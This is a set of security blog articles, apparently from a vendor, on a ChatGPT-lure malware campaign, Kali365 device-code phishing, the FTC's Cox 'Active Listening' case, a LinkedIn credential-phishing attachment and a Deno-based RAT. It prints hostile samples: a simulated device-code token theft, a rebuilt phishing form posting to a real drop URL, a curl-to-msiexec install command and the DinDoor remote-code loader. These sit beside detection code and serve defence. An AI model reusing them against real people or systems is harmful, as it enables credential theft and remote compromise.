- Reinstall the operating system. The Windows sample showed PowerShell command-and-control behavior, while the macOS payload may have captured the user’s login password. A clean reinstall is the safest recovery path.
- If this was a work device, contact your IT or security team immediately.
The reason this campaign is worth writing about is not the malware itself. Both payloads are already well documented. The Windows side is a commodity kit assembled from cheap, widely available parts. The macOS side is AMOS, a malware family that has been tracked since 2023.
What’s more interesting is the shape of the operation around that malware. A single fake site delivers two different payloads aimed at two different victim economics. Windows victims are positioned for broad monetization through credential and cookie theft. Mac victims are targeted more narrowly and lucratively through cryptocurrency theft, with operators apparently willing to spend thousands per month on tooling because the returns justify it.
The lure tying both sides together is the AI brand itself. Right now, AI product names generate huge amounts of first-time-download traffic from users who do not yet know the official URLs.
This is what a mature delivery business looks like. The interesting layer is not the binary, but the supply chain around it: the domain, certificate, clone page, traffic source, malware subscription, and exfiltration infrastructure. Each piece is cheap, modular, replaceable, and available off the shelf.
And the operators are not choosing between Windows and macOS. They are serving both from the same page, with payloads tuned to each platform’s economics. When one AI brand stops converting, they can simply swap the branding and reuse the same infrastructure around the next trending product.
AI hype will eventually fade. The kit probably will not.
Indicators of Compromise (IOCs)
File hashes (SHA-256)
- c9e0e6985dca3a179c9bdea4e7b38f7dc57fe00ecedc2fd634256fc53bf2de2d (Chat_GPT.exe)
- c0919e1999eaee67e67aeda0287722775afb04e9a9a0f727928b4d11265fb70b (ChatGpt.dmg)
Network indicators
- openew[.]app
- 188[.]137[.]246[.]189
- 192[.]253[.]248[.]181
- 172[.]94[.]9[.]250
Kali365 phishing kit bypasses MFA and steals Microsoft logins
When the Federal Bureau of Investigation (FBI) publishes a dedicated public service announcement about a new phishing kit, it’s worth paying attention to.
The agency is now warning about “Kali365,” a phishing‑as‑a‑service (PhaaS) platform that helps even low‑skilled attackers hijack Microsoft 365 accounts by stealing access tokens instead of passwords.
Although early reporting focuses on attacks against organizations, the underlying technique works just as easily against individual Microsoft 365 users who are tricked into entering a short code on a real Microsoft website. In other words, this is not just a business or IT department problem. It could affect anyone with an Outlook, OneDrive, or Microsoft 365 subscription.
For cybercriminals using the kit, it offers three clear advantages:
- It sidesteps multi‑factor authentication (MFA). The victim completes the password and MFA prompts themselves, on Microsoft’s real sign‑in page, and the resulting access and refresh tokens are issued to the attacker’s device. Extra codes or apps no longer help once those tokens exist.
- Kali365 provides ongoing access. The attackers can keep using Outlook, Teams, and OneDrive without repeatedly logging in, as long as the stolen refresh token remains valid.
- Little technical skill needed. Cybercriminals can subscribe to Kali365 and immediately run token‑stealing campaigns at scale.
Victims receive a phishing message that looks like it comes from a cloud service or collaboration tool, such as a document‑sharing notification or Teams invite. The message includes a short “device code” and instructions like: “Go to Microsoft’s verification page and enter this code to view the document.”
Unlike many phishing emails, this one sends you to a real Microsoft URL used for device sign‑in flows. To the user, the page looks familiar and completely legitimate, which lowers suspicion.
Victims then see the standard Microsoft sign‑in and consent screens and may think they are simply completing a normal security check. They never see a fake page, never type their password into a suspicious form, and may even see their organization’s branding.
But what they don’t realize is that they have handed access to the attacker.
Once the victim approves the request, the attacker’s device receives OAuth access and refresh tokens tied to the victim’s Microsoft 365 account. These tokens are what Microsoft uses to “remember” that you have already logged in, and they can be reused to access Outlook, OneDrive, Teams, and other Microsoft services without entering a password again.
With valid refresh tokens, attackers can maintain long‑term access until the tokens are revoked or expire, often blending in with normal account activity.
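The exchange described above is the OAuth 2.0 device authorization grant (RFC 8628). The following offline model is an added example written for this article, not Kali365’s code and not anything Malwarebytes published: DeviceCodeServer stands in for Microsoft’s real endpoints (the /oauth2/v2.0/devicecode and /oauth2/v2.0/token endpoints on login.microsoftonline.com, with the victim typing the code at https://microsoft.com/devicelogin), the tokens are random strings rather than signed JWTs, and the client name, scopes and account are made up. What it shows is who starts the flow, who approves it, and who ends up holding the refresh token.

```python
"""Offline model of the device authorization grant as abused by device-code
phishing. Added example: server, tokens and codes are simplified stand-ins."""
import secrets


class FakeClock:
    """Deterministic clock so expiry and polling intervals can be shown offline."""
    def __init__(self):
        self.t = 0.0

    def __call__(self):
        return self.t

    def advance(self, seconds):
        self.t += seconds


class DeviceCodeServer:
    def __init__(self, clock, expires_in=900, interval=5):
        self.clock, self.expires_in, self.interval = clock, expires_in, interval
        self.pending = {}         # device_code -> pending authorization
        self.by_user_code = {}    # user_code  -> device_code
        self.refresh_tokens = {}  # refresh_token -> account it was issued to

    def device_authorization(self, client_id, scope):
        """Step 1: the ATTACKER's device starts the flow and receives both codes."""
        device_code = secrets.token_hex(16)
        user_code = f"{secrets.token_hex(2).upper()}-{secrets.token_hex(2).upper()}"
        self.pending[device_code] = {"client_id": client_id, "scope": scope,
                                     "user_code": user_code, "issued": self.clock(),
                                     "approved_by": None, "last_poll": None}
        self.by_user_code[user_code] = device_code
        return {"device_code": device_code, "user_code": user_code,
                "verification_uri": "https://login.example/device",
                "expires_in": self.expires_in, "interval": self.interval}

    def approve(self, user_code, account):
        """Step 2: the VICTIM types user_code on the genuine site and completes
        password and MFA there. Nothing is captured; the attacker's pending
        request is simply bound to the victim's account."""
        rec = self.pending.get(self.by_user_code.get(user_code))
        if rec is None or self.clock() - rec["issued"] > self.expires_in:
            return False
        rec["approved_by"] = account
        return True

    def token(self, device_code):
        """Step 3: the attacker polls /token. Error codes follow RFC 8628 s.3.5."""
        rec = self.pending.get(device_code)
        if rec is None:
            return {"error": "invalid_grant"}
        now = self.clock()
        if now - rec["issued"] > self.expires_in:
            del self.pending[device_code]
            return {"error": "expired_token"}
        if rec["last_poll"] is not None and now - rec["last_poll"] < self.interval:
            return {"error": "slow_down"}
        rec["last_poll"] = now
        if rec["approved_by"] is None:
            return {"error": "authorization_pending"}
        del self.pending[device_code]
        refresh = secrets.token_hex(32)
        self.refresh_tokens[refresh] = rec["approved_by"]
        return {"access_token": secrets.token_hex(32), "refresh_token": refresh,
                "token_type": "Bearer", "expires_in": 3600, "account": rec["approved_by"]}

    def refresh(self, refresh_token):
        """Ongoing access: a refresh token mints new access tokens with no
        password and no MFA prompt until it is revoked or expires."""
        account = self.refresh_tokens.get(refresh_token)
        if account is None:
            return {"error": "invalid_grant"}
        return {"access_token": secrets.token_hex(32), "account": account}

    def revoke_all(self, account):
        """What 'sign out everywhere' does server-side: drop every refresh token."""
        for rt in [k for k, v in self.refresh_tokens.items() if v == account]:
            del self.refresh_tokens[rt]


def run_phish(server, clock, victim="victim@example.com"):
    """The whole exchange from the attacker's side; returns what each step saw."""
    start = server.device_authorization("attacker-client", "offline_access Mail.Read Files.Read")
    first_poll = server.token(start["device_code"])          # nothing yet
    clock.advance(start["interval"])
    # ... the lure delivers start["user_code"]; the victim enters and approves it ...
    approved = server.approve(start["user_code"], victim)
    tokens = server.token(start["device_code"])              # now the tokens arrive
    return {"first_poll": first_poll.get("error"), "approved": approved, "tokens": tokens}


if __name__ == "__main__":
    clock = FakeClock()
    server = DeviceCodeServer(clock)
    result = run_phish(server, clock)
    print("attacker now holds a refresh token for", result["tokens"]["account"])
```

Two details matter for defenders. The victim never types a password anywhere but the real site, so password-phishing controls and training do not fire; and the tokens are issued to whichever device called the devicecode endpoint, which is why revoking sessions (revoke_all above) is the step that actually ends the attacker’s access.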
That access can allow cybercriminals to:
- Read Outlook emails, including password reset messages
- Access files stored in OneDrive or SharePoint
- Send phishing emails to coworkers, customers, friends, or family from the victim’s account
Once in Outlook, attackers can not only read your messages but also send convincing new ones from your address, using your identity to compromise additional accounts and contacts.
Some tips to steer clear of this one:
- Never enter a code at a Microsoft login page just because an email or message tells you to. You should only do this when you initiated the sign‑in yourself on your own device.
- Slow down and read the prompts. Rushing through login approvals without reading them carefully can be costly.
- Be suspicious of unexpected document shares, Teams invites, or login requests, even if they use legitimate Microsoft pages.
- Review which devices are signed in to your account at https://account.microsoft.com/devices/. For a work or school account, check recent activity at https://mysignins.microsoft.com/ and ask your administrator to revoke your sign‑in sessions if anything looks wrong. If you see unfamiliar devices or sign‑ins, remove them, change your Microsoft account password, and review your security settings.
Pro tip: Malwarebytes Scam Guard can help you figure out if a message is a scam.
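For organizations, the same attack leaves a distinctive trace in the Entra ID sign‑in log: the record carries authenticationProtocol set to deviceCode, and it comes from the attacker’s machine rather than the user’s. The following is an added example (not Malwarebytes’ tooling, not something the FBI advisory contains) that hunts for that pattern over sign‑in records. The log lines are constructed to mirror the shape of Microsoft Graph sign‑in entries; the accounts, IPs and app names are made up.

```python
"""Hunt for device-code phishing in Entra ID sign-in logs. Added example.
A deviceCode sign-in is rare for most users and, in this attack, always
originates from the attacker's machine, so a deviceCode sign-in from an IP
the account has no history with is the signal to alert on."""
import json
from collections import defaultdict

# Constructed sample: ordinary sign-ins to build a baseline, a developer (bob)
# using device code legitimately from his usual IP, then the attacker
# redeeming the victim's approval from an unfamiliar address (one failed,
# one successful attempt).
SAMPLE_SIGNINS = """
{"createdDateTime":"2026-05-26T08:02:11Z","userPrincipalName":"victim@example.com","ipAddress":"203.0.113.10","authenticationProtocol":"oAuth2","appDisplayName":"Microsoft Teams","status":{"errorCode":0}}
{"createdDateTime":"2026-05-26T09:15:40Z","userPrincipalName":"victim@example.com","ipAddress":"203.0.113.10","authenticationProtocol":"oAuth2","appDisplayName":"Outlook","status":{"errorCode":0}}
{"createdDateTime":"2026-05-26T09:18:12Z","userPrincipalName":"bob@example.com","ipAddress":"198.51.100.7","authenticationProtocol":"oAuth2","appDisplayName":"Outlook","status":{"errorCode":0}}
{"createdDateTime":"2026-05-26T09:20:02Z","userPrincipalName":"bob@example.com","ipAddress":"198.51.100.7","authenticationProtocol":"deviceCode","appDisplayName":"Azure CLI","status":{"errorCode":0}}
{"createdDateTime":"2026-05-27T14:31:55Z","userPrincipalName":"victim@example.com","ipAddress":"192.0.2.66","authenticationProtocol":"deviceCode","appDisplayName":"Microsoft Office","status":{"errorCode":50126}}
{"createdDateTime":"2026-05-27T14:32:10Z","userPrincipalName":"victim@example.com","ipAddress":"192.0.2.66","authenticationProtocol":"deviceCode","appDisplayName":"Microsoft Office","status":{"errorCode":0}}
"""


def load_signins(text):
    """Parse one JSON sign-in record per line."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def baseline_ips(records):
    """IPs each account has used for successful, non-device-code sign-ins."""
    seen = defaultdict(set)
    for r in records:
        if r["authenticationProtocol"] != "deviceCode" and r["status"]["errorCode"] == 0:
            seen[r["userPrincipalName"]].add(r["ipAddress"])
    return seen


def find_device_code_abuse(records):
    """Successful deviceCode sign-ins from an address the account has never used.
    Failed attempts are skipped (no token was issued), and bob's Azure CLI
    sign-in from his usual IP is ordinary developer use."""
    known = baseline_ips(records)
    hits = []
    for r in records:
        if r["authenticationProtocol"] != "deviceCode" or r["status"]["errorCode"] != 0:
            continue
        user, ip = r["userPrincipalName"], r["ipAddress"]
        if ip not in known.get(user, set()):
            hits.append({"user": user, "ip": ip, "app": r["appDisplayName"],
                         "time": r["createdDateTime"]})
    return hits


if __name__ == "__main__":
    for hit in find_device_code_abuse(load_signins(SAMPLE_SIGNINS)):
        print("device-code sign-in from unknown address:", hit)
```

Where device code sign‑in is not needed at all, Entra Conditional Access can block the flow outright through its “Authentication flows” condition, which removes the attack surface rather than detecting it after the fact.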
Company bragged phone mics could listen to conversations. They couldn’t.
A media company and two of its marketing partners have been fined for selling a service which, they said, listened in to people’s conversations through their phones. Actually they did nothing of the sort.
Most people have worried at some point that their phone has been listening to them through the microphone. You know how it goes: One minute you’re speaking to your friend about how you’ve always wanted to go to Fiji, the next minute you’re seeing social media ads for vacations there. However, as yet there hasn’t been much real proof that this is actually happening.
But that didn’t stop Cox Media Group from claiming it could listen in. Between 2023 and 2024, the company publicly promoted a service called “Active Listening” or “Voice Data,” claiming it used AI-powered voice-processing technology to capture conversations from smartphones, along with smart TVs and other devices with embedded microphones.
The company told potential advertising clients that the system provided a tool to target, retarget, and retain customers.
The scandal came to light when 404 Media published internal pitch decks from Cox that detailed the supposed “Active Listening” capabilities. After the revelations, Cox initially backpedaled and denied listening to conversations, but the marketing materials contradicted these denials.
The FTC found that the “Active Listening” service was completely fabricated. The service did not listen to consumers’ conversations or use voice data at all, nor did it accurately place ads in customers’ desired geographic locations. Instead, Cox and its partners simply resold email lists obtained from other data brokers at a significant markup.
Worst of all, the companies also falsely claimed that consumers had opted into voice data collection when they had not.
The Federal Trade Commission (FTC) fined the companies a total of $930,000 for falsely claiming they could spy on consumers. Cox Media Group must pay $880,000, while MindSift and 1010 Digital Works will each pay $25,000. The settlement funds will be used to provide refunds to Cox Media Group customers who were deceived by these false claims.
Are your details being used by cybercriminals? How to safekeep your personal data
In this case, the data that was being sold came from data brokers. Keeping your personal data away from them requires a combination of preventive measures and active removal efforts.
- Minimize what you share on social media and elsewhere online. Data brokers use scraping tools to gather information from forum posts and public profiles, so avoid sharing sensitive details like your birth date, home address, phone number, and financial information.
- Before signing up for online services, loyalty programs, or apps, carefully read privacy policies to understand how companies will collect, use, and share your data.
- For active data removal, your options depend largely on where you live. It’s often best to leave that work to a specialized service you can trust.
- Disable advertising IDs on your smartphones, tablets, and computers through your device settings where possible.
- Use a VPN to hide your IP address and encrypt your browsing traffic, install ad and tracking blockers, and consider using more privacy-focused browsers.
We looked into this very topic on our Lock and Code podcast. Listen to it below, or search for it on your favorite podcast player.
Fake LinkedIn emails abuse Adobe to track victims
Cybercriminals are abusing Adobe infrastructure in a LinkedIn phishing campaign that steals passwords and redirects victims to the legitimate LinkedIn site afterward.
The phishing email masquerades as a business inquiry designed to look like it’s come via LinkedIn and includes a fake “contract” attachment. But it contains a number of red flags:
- The sender name, email address, and email signature don’t match
- The sender company exists, but not in the US
- The sender name exists, but not at that company
- The attachment has a double file extension: pdf.html
“I would like to do business with you via LinkedIn. I’m a buyer.
Please find attached the signed contract No. #33110:12000pcs.
I look forward to hearing from you.”
Double file extensions are often used to mislead recipients into thinking a file is something other than what it really is. The attached HTML file is heavily obfuscated; it is essentially a single line of JavaScript.
The script uses two common obfuscation layers: URL encoding and Base64. The script is divided into two Base64-encoded sections.
When you open the attachment, you’ll find a simple login form.
The target’s email address is hardcoded, and you’re unable to change or remove it. Possibly because some researchers have no qualms about flooding the receiving channel with false credentials.
But figuring out the receiving channel is where it gets interesting. Network analysis reveals this URL:
https://lnkd.tt.omtrdc.net/rest/v1/delivery
This domain belongs to Adobe and is associated with the Adobe Target A/B testing platform. The campaign isn’t using Adobe Target to receive the phished credentials, though. Instead, the attackers abuse Adobe Target as a redirect and tracking hop in the phishing flow, most likely to count the victims who fell for the email.
In the end, it redirects the target to the legitimate business.linkedin.com site to reduce any suspicion the target may still have.
After deobfuscating the scripts, we found the destination for the submitted credentials:
All in all, even with the level of obfuscation, the method is very raw and simple:
POST to: http://a1263367.xsph.ru/taam/Ln.php
With data:
- AA = hardcoded email address
- BB = whatever password the user entered
The PHP file hosted on a .ru domain handles the redirect to LinkedIn, making the victim think they just logged in successfully.
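The deobfuscation described above is mechanical enough to script. The following is an added example written for this article, not Malwarebytes’ analysis tooling: it constructs a lookalike attachment with the same layering (a URL‑encoded loader wrapping two Base64 sections, a hardcoded victim address, a POST of AA and BB, and a redirect to LinkedIn), then peels the layers off and pulls out the drop point. The drop URL is the one reported above; the victim address and form markup are made up.

```python
"""Peel the layers off an HTML phishing attachment and extract its drop point.
Added example: the attachment is constructed here to mirror the described
structure; only the POST URL is taken from the article."""
import base64
import re
from urllib.parse import quote, unquote


def build_sample_attachment(victim="victim@example.com"):
    """Construct a lookalike: form + exfil script, each Base64 encoded, then the
    whole loader URL-encoded into a single eval() line."""
    form_html = (f'<form id="f"><input type="email" name="AA" value="{victim}" readonly>'
                 '<input type="password" name="BB" placeholder="Password">'
                 '<button type="submit">Open PDF</button></form>')
    exfil_js = ('f.onsubmit=e=>{e.preventDefault();'
                'fetch("http://a1263367.xsph.ru/taam/Ln.php",{method:"POST",body:new FormData(f)})'
                '.finally(()=>location="https://business.linkedin.com/")}')

    def b64(s):
        return base64.b64encode(s.encode()).decode()

    loader = f'document.write(atob("{b64(form_html)}"));eval(atob("{b64(exfil_js)}"))'
    return f'<html><script>eval(decodeURIComponent("{quote(loader, safe="")}"))</script></html>'


def _decode_atob(m):
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (ValueError, UnicodeDecodeError):
        return m.group(0)


def peel(blob, max_rounds=10):
    """Repeatedly undo URL encoding and inline atob("...") Base64 until nothing
    changes. Returns every intermediate layer, outermost first."""
    layers = [blob]
    for _ in range(max_rounds):
        cur = layers[-1]
        nxt = unquote(cur) if re.search(r"%[0-9A-Fa-f]{2}", cur) else cur
        nxt = re.sub(r'atob\(["\']([A-Za-z0-9+/=]+)["\']\)', _decode_atob, nxt)
        if nxt == cur:
            break
        layers.append(nxt)
    return layers


POST_RE = re.compile(r'fetch\(["\'](https?://[^"\']+)["\']\s*,\s*\{[^}]*method\s*:\s*["\']POST', re.I)
XHR_RE = re.compile(r'\.open\(\s*["\']POST["\']\s*,\s*["\'](https?://[^"\']+)', re.I)
EMAIL_RE = re.compile(r'<input[^>]*type=["\']email["\'][^>]*value=["\']([^"\']+)', re.I)
FIELD_RE = re.compile(r'<input[^>]*name=["\'](\w+)["\']', re.I)
REDIRECT_RE = re.compile(r'location\s*=\s*["\'](https?://[^"\']+)', re.I)


def extract_indicators(attachment):
    """Peel, then regex the innermost layer for what an analyst wants: where
    credentials go, which address is pinned, and where the victim lands."""
    layers = peel(attachment)
    final = layers[-1]
    post = POST_RE.search(final) or XHR_RE.search(final)
    email = EMAIL_RE.search(final)
    redirect = REDIRECT_RE.search(final)
    return {"post_url": post.group(1) if post else None,
            "hardcoded_email": email.group(1) if email else None,
            "fields": FIELD_RE.findall(final),
            "redirect": redirect.group(1) if redirect else None,
            "layers": len(layers)}


if __name__ == "__main__":
    print(extract_indicators(build_sample_attachment()))
```

The peeler stops as soon as a round changes nothing, so it copes with attachments that nest more layers than this one, and the indirect atob/fetch patterns are the same ones to look for in real samples before deciding to block a host.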
How to stay safe
The good news: once you know what to look for, these attacks are much easier to spot and block. The bad news: they’re cheap, scalable, and likely to keep circulating.
So, the next time a “PDF” asks for your password in a browser, pause and think about what might be hiding underneath.
Beyond avoiding unsolicited attachments, here are a few ways to stay safe:
- Only access your accounts through official apps or by typing the official website directly into your browser.
- Check file extensions carefully. Even if a file looks like a PDF, it may not be.
- Enable multi-factor authentication for your critical accounts.
- Use an up-to-date, real-time anti-malware solution with a web protection module.
Pro tip: Malwarebytes Scam Guard recognized this email as a scam.
Fake software on GitHub and SourceForge distributes Deno RAT
During our threat hunting activities, we found fake installers and plugins impersonating popular software including ChatGPT, Claude, AutoTune, and Kontakt on GitHub and SourceForge distributing a Deno backdoor known as DinDoor. Attackers are using compromised YouTube channels to distribute links to these platforms.
DinDoor ultimately drops different types of malware, including a stealthy remote access Trojan (RAT), which also uses the Deno JavaScript runtime.
Attackers are increasingly abusing alternative JavaScript runtimes like Bun and Deno to bypass traditional detection methods. In one of our recent investigations we documented how attackers are using Bun as an initial infection vector to distribute NWHStealer. And in March, ThreatDown researchers also observed attackers using Deno to deliver CastleLoader through a multi-stage infection chain involving the ClickFix lure.
These campaigns use Scoop (a third-party installer for Windows) and WinGet (the official Windows package manager) to install Deno on the victim’s machine. They then use the Deno runtime to execute a RAT that can run additional payloads and exfiltrate data from browsers, wallets, and other applications, and that has an unusual peer-to-peer feature which routes screen streaming through Microsoft Edge to hide the traffic.
Legitimate platforms abused to spread malware
In most of the analyzed cases, the infection chain starts with MSI files or PowerShell scripts downloaded from GitHub or SourceForge. Users are typically steered to these malicious repositories by compromised YouTube channels; the videos currently total more than 50,000 views.
[Image: Compromised YouTube channels with AI-generated videos]
The compromised YouTube channels create posts promoting different software and constantly switch between GitHub accounts to distribute the malware.
[Image: YouTube posts linking to the malicious GitHub repositories]
The fake software appears designed to target creators, AI enthusiasts, gamers, and technically inclined users, who are more likely to download unofficial tools, cracked software, or community-distributed installers from sites like GitHub and SourceForge. We’ve observed fake MSIs and scripts masquerading as installers and plugins for legitimate software and brands such as ChatGPT, Claude, ZENOLOGY, Ableton Live, AutoTune, and Kontakt.
[Image: GitHub repository for fake ChatGPT installer]
The malicious repositories offer a command for both Windows and macOS. They ask users to open a terminal and paste the command, which downloads and executes the MSI from GitHub.
[Image: Fake plugin that asks the user to copy and execute the malicious command]
Malicious GitHub accounts create multiple repositories filled with fake software and plugins related to popular software to lure in more users.
[Image: GitHub account with different malicious repositories]
We found the same backdoor distributed through SourceForge, mimicking a legitimate game utility called GearUP and an AI watermark remover called BWR.
[Image: The malicious MSI files hosted on SourceForge]
How to stay safe
The attackers relied heavily on trust. GitHub and SourceForge are legitimate platforms, which makes fake projects look more convincing. We contacted GitHub, which quickly removed the malicious repositories, but users should expect new ones to continue appearing.
Here are a few simple ways to stay safe:
- Only download software from official vendor websites.
- Be skeptical of “free”, cracked, or unofficial versions of paid software.
- Be cautious with downloads from GitHub, SourceForge, forums, or file-sharing sites, especially from new or unknown accounts.
- Attackers continue to create new profiles to distribute this malware across platforms. Check the developer or publisher’s profile, its reputation, and how recently it was created before downloading anything.
- Check that archive contents, images, and text files align with what you expected to download. Archive names and structures often follow recognizable malicious patterns.
- Check the file’s publisher and digital signature before you run it. On Windows, you can usually check this by right-clicking the file and selecting Properties > Digital Signatures. Keep in mind that a valid signature does not guarantee a file is safe, but a missing or suspicious signature is often a red flag.
The malicious GitHub repositories ask the user to open cmd and execute a malicious command. The malicious commands download an MSI from GitHub and install it via msiexec. These repositories sometimes also contain PowerShell scripts to similarly initiate the infection chain.
Example of a malicious command hosted on GitHub that starts the infection chain:
curl -Lo %temp%\s.msi https://raw.githubusercontent.com/claude-free-plugin/install/main/install.msi && msiexec /i %temp%\s.msi
The MSI drops a CMD file and a PowerShell script into a random directory specified by the MSI InstallationFolder and registry values. We observed different structures for these MSIs: some use JavaScript instead of the CMD file, and some carry additional embedded files.
[Image: The “Ps1File” and “CmdFile” inside the MSI dropper]
The CMD file executes the PowerShell script, whose name changes between the analyzed infection chains:
@set "SCRIPTDIR=%~dp0"
@powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Start-Process powershell -ArgumentList ('-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File ""' + $env:SCRIPTDIR + '{Random name}.ps1""') -WindowStyle Hidden"
[Image: The executed PowerShell script]
The PowerShell script takes care of:
- Ensuring the package manager Scoop is installed, and installing it if missing with the official script from get.scoop.sh. Scoop is a popular, open-source command-line software installer and package manager for Windows.
- Using Scoop to install WinGet (Windows Package Manager) if missing.
- Installing Deno (a JavaScript/TypeScript runtime) via WinGet or Scoop if not present.
The usage of the package managers Scoop and WinGet to install additional software on the compromised machine is an interesting approach that gives the attacker more flexibility.
Command executed to install Deno using WinGet:
"C:\Users\admin\scoop\apps\winget\current\winget.exe" install --id DenoLand.Deno -e --accept-source-agreements --accept-package-agreements --silent
The DinDoor Backdoor
Next, the following stage is executed with the newly installed Deno executable:
"C:\Users\admin\AppData\Local\Microsoft\WinGet\Packages\DenoLand.Deno_Microsoft.Winget.Source_8wekyb3d8bbwe\deno.exe" run -A http://{C2}/{random_path}.js
The returned code (internal name “launcher-1”) is a small eval loop that downloads the next stage (internal name “launcher-2”). The downloaded backdoor is publicly known as DinDoor.
var a = "{C2}".split(","), i = 0;                       // list of C2 hosts and a round-robin index
for (;;) {
  let e = null;
  try {
    let t = await fetch(a[i % a.length] + "/{BUILD_ID}.js");  // fetch the next stage (launcher-2)
    if (!t.ok) throw 0;
    e = await t.text();
  } catch {
    i++;                                                 // rotate to the next C2 on any failure
    await new Promise(t => setTimeout(t, 5e3));          // wait 5 s and retry
    continue;
  }
  try {
    await (0, eval)("(async()=>{" + e + "})()");         // indirect eval: run the stage in global scope
  } catch {}
  await new Promise(t => setTimeout(t, 3e4));            // poll again every 30 s
}
The backdoor handles persistence, sends information about the compromised system to the command-and-control server (C2), and executes additional payloads and commands returned by the C2. The HTTP endpoints used for C2 communications vary between the analyzed cases.
The backdoor obtains an ID from an HTTP endpoint (for example, /security-pool) and then uses that ID to obtain the next stage from /v2{ID}.js.
The obtained stage is executed via stdin without being written to disk, using the command:
deno run -A --no-check -
To achieve persistence, the backdoor runs a PowerShell command to create a Run key that executes the downloader “launcher-1” used previously:
conhost.exe --headless "<deno.exe>" -A "%APPDATA%\<hash>.js"
This backdoor distributes several malware families in the analyzed cases. In this blog, we analyze one of the distributed payloads: a RAT that uses the Deno JavaScript runtime.
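Each stage of this chain produces a distinctive process-creation event, and developers do legitimately install Deno, so the useful detection is the sequence rather than any single command. The following is an added example written for this article, not Malwarebytes’ or ThreatDown’s detection logic: it runs a handful of regular-expression rules over process telemetry and alerts only when several distinct stages appear on one host. The log lines are constructed to mirror the command lines quoted above (reduced to the fields the rules need); the hostnames, paths and the hash-named persistence file are made up, and the C2 hostname in the deno run line is one of the domains listed in this article’s IOCs.

```python
"""Flag the Scoop/WinGet/Deno infection chain in process-creation telemetry.
Added example: constructed Sysmon/EDR-style events, not real telemetry."""
import json
import re
from collections import defaultdict

# Each rule is matched against the lowercased command line.
RULES = [
    ("download_msi_from_github",
     re.compile(r"curl\s.*-lo\s+%temp%\\.*raw\.githubusercontent\.com.*&&\s*msiexec\s+/i")),
    ("hidden_bypass_powershell",
     re.compile(r"powershell(\.exe)?\s.*-executionpolicy\s+bypass.*-windowstyle\s+hidden")),
    ("deno_installed_by_pkgmgr",
     re.compile(r"(winget(\.exe)?\"?\s+install\s+--id\s+denoland\.deno|scoop\s+install\s+deno)")),
    ("deno_runs_remote_script",
     re.compile(r"deno(\.exe)?\"?\s+run\s+(-a|--allow-all)\s+.*https?://")),
    ("deno_runs_stdin_script",
     re.compile(r"deno(\.exe)?\"?\s+run\s+-a\s+--no-check\s+-(\s|$)")),
    ("headless_conhost_deno_persistence",
     re.compile(r"conhost(\.exe)?\s+--headless\s+.*deno(\.exe)?\"?\s+-a\s+.*%appdata%\\")),
]

# Constructed events: WS-PC01 walks the whole chain; DEV-BOX is a developer
# installing Deno and running a local script, which must not alert.
SAMPLE_LOG = r"""
{"ts":"2026-05-27T10:00:01Z","host":"WS-PC01","parent":"cmd.exe","cmdline":"curl -Lo %temp%\\s.msi https://raw.githubusercontent.com/claude-free-plugin/install/main/install.msi && msiexec /i %temp%\\s.msi"}
{"ts":"2026-05-27T10:00:09Z","host":"WS-PC01","parent":"cmd.exe","cmdline":"powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command \"Start-Process powershell -ArgumentList ('-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File \"\"C:\\Users\\admin\\AppData\\Local\\Temp\\x7q2\\k3j9.ps1\"\"') -WindowStyle Hidden\""}
{"ts":"2026-05-27T10:01:30Z","host":"WS-PC01","parent":"powershell.exe","cmdline":"\"C:\\Users\\admin\\scoop\\apps\\winget\\current\\winget.exe\" install --id DenoLand.Deno -e --accept-source-agreements --accept-package-agreements --silent"}
{"ts":"2026-05-27T10:02:15Z","host":"WS-PC01","parent":"powershell.exe","cmdline":"\"C:\\Users\\admin\\AppData\\Local\\Microsoft\\WinGet\\Packages\\DenoLand.Deno_Microsoft.Winget.Source_8wekyb3d8bbwe\\deno.exe\" run -A http://hngfbgfbfb.cyou/q8f1.js"}
{"ts":"2026-05-27T10:02:40Z","host":"WS-PC01","parent":"deno.exe","cmdline":"deno run -A --no-check -"}
{"ts":"2026-05-27T10:03:00Z","host":"WS-PC01","parent":"explorer.exe","cmdline":"conhost.exe --headless \"C:\\Users\\admin\\AppData\\Local\\Microsoft\\WinGet\\Packages\\DenoLand.Deno_Microsoft.Winget.Source_8wekyb3d8bbwe\\deno.exe\" -A \"%APPDATA%\\3f9c1a2b.js\""}
{"ts":"2026-05-27T11:10:00Z","host":"DEV-BOX","parent":"cmd.exe","cmdline":"winget install --id DenoLand.Deno -e"}
{"ts":"2026-05-27T11:12:00Z","host":"DEV-BOX","parent":"cmd.exe","cmdline":"\"C:\\Users\\dev\\AppData\\Local\\Microsoft\\WinGet\\Packages\\DenoLand.Deno_Microsoft.Winget.Source_8wekyb3d8bbwe\\deno.exe\" run -A main.ts"}
"""


def match_rules(cmdline):
    """Names of every rule a single command line trips."""
    low = cmdline.lower()
    return [name for name, rx in RULES if rx.search(low)]


def load_events(text):
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def detect_chain(events, min_stages=3):
    """Alert per host once at least min_stages distinct stages have been seen,
    listing the stages in the order they first appeared."""
    first_seen = defaultdict(dict)  # host -> {stage: first timestamp}
    for ev in events:
        for stage in match_rules(ev["cmdline"]):
            first_seen[ev["host"]].setdefault(stage, ev["ts"])
    alerts = []
    for host, stages in first_seen.items():
        if len(stages) >= min_stages:
            alerts.append({"host": host, "stages": sorted(stages, key=stages.get)})
    return alerts


if __name__ == "__main__":
    for alert in detect_chain(load_events(SAMPLE_LOG)):
        print(alert)
```

The two Deno rules are the ones worth keeping even on their own: a Deno process granted every permission (-A) to a script fetched over plain HTTP, or fed a script on stdin with type checking disabled, has no ordinary developer explanation.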
Deno RAT
The delivered RAT, like the other analyzed scripts, uses the Deno JavaScript environment and has full functionality to control the device, execute commands and payloads, and exfiltrate various types of data through its built-in stealer module.
We did not find a specific name or attribution for this RAT. In the past, the RAT has been referred to as “Smokest” based on a specific value in the config. The similar commenting style and shared infrastructure suggest that the DinDoor developer and the RAT developer may be the same person or team.
In addition to HTTP for C2 communication, the RAT also supports WebSocket communication, enabled when the JSON value isLiveEnabled returned from the C2 is set to true.
[Image: The main function of the Deno RAT]
The RAT supports the following commands (exec, exec-ps, exec-sc, sysinfo, screenshot, stealer) and functionality:
- Collect system information about the compromised device
- Full bidirectional control through a custom VNC implementation over WebSocket
